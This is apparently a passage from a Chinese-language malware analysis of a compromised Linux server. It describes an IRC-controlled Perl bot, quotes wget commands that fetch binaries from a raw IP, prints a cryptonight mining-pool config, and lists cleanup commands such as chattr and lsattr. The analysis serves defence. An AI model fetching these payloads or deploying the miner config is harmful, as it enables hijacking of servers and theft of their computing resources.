inet_ntoa(((gethostbyname($address))[4])[0]); } else { return; }} 这个perl代码,主要是与IRC服务器通讯,通讯的目的是让“对方”控制当前主机;猜测其主要作用是控制下载真正的木马程序并发起DDOS攻击。
前面的shell脚本代码中的 wget http://65.254.63.20/apache 和 wget http://65.254.63.20/apacheaes 是下载可执行程序,完成下载后被更名为apache和apache2并启动;所下载的 http://65.254.63.20/httpd.conf 文件是作为这两个可执行程序的配置文件,内容如下:
{ "url" : "stratum+tcp://176.9.147.78:45560", "url" : "stratum+tcp://176.9.2.145:45560", "url" : "stratum+tcp://176.9.147.178:45560", "user" : "bl4ckbone@protonmail.com", "pass" : "x", "algo" : "cryptonight", "quiet" : true}
猜测的下一步动作:
上面的perl程序和apache、apache2程序运行一定时间后,会自动下载名称为 xxxxxLinux 可执行程序(其中 xxxxx 是随机名称),这个文件被执行以后,会释放出一些可执行程序 以替换掉系统中的相应可执行程序(如 ps,lsof,ss,netstat 等)。/etc/cron.daily/目录下会产生相应的执行文件。/etc/rc.d/rc.local 被修改加入相应执行程序完整路径,/etc/rc.local软链接被删除并复制修改后的/etc/rc.d/rc.local文件过来(充当/etc/rc.local文件)。
一些有用的命令:
(1)查找根路径(/)下最近50天内被修改的可执行文件: find / -type f -perm /111 -mtime -50
(2)查看指定文件的可修改属性: lsattr /etc/rc.d/rc.local # 显示内容如下:
-------------e-- /etc/rc.d/rc.local
(3)设置指定文件为禁止修改: chattr +i /etc/rc.d/rc.local # 执行后该文件不允许删除[ rm -f ]和修改,注意只能对root用户组的文件进行设置
# lsattr /etc/rc.d/rc.local
----i--------e-- /etc/rc.d/rc.local # 注意这里第5列为字母i
(4)设置指定文件为允许修改: chattr -i /etc/rc.d/rc.local # 恢复为可删除和修改
(5)强制退出指定用户登录: pkill -9 -t pts/1 # 这里的 pts/1 是执行 w 命令以后相应已登录用户的TTY列内容
(6)获得指定可执行文件的文本内容: strings /root/xxxxxLinux2.6>strings_Linux26.txt # 用于查看和分析木马程序中的可疑文本,如 IP地址或域名
<<后续根据情况再修改>>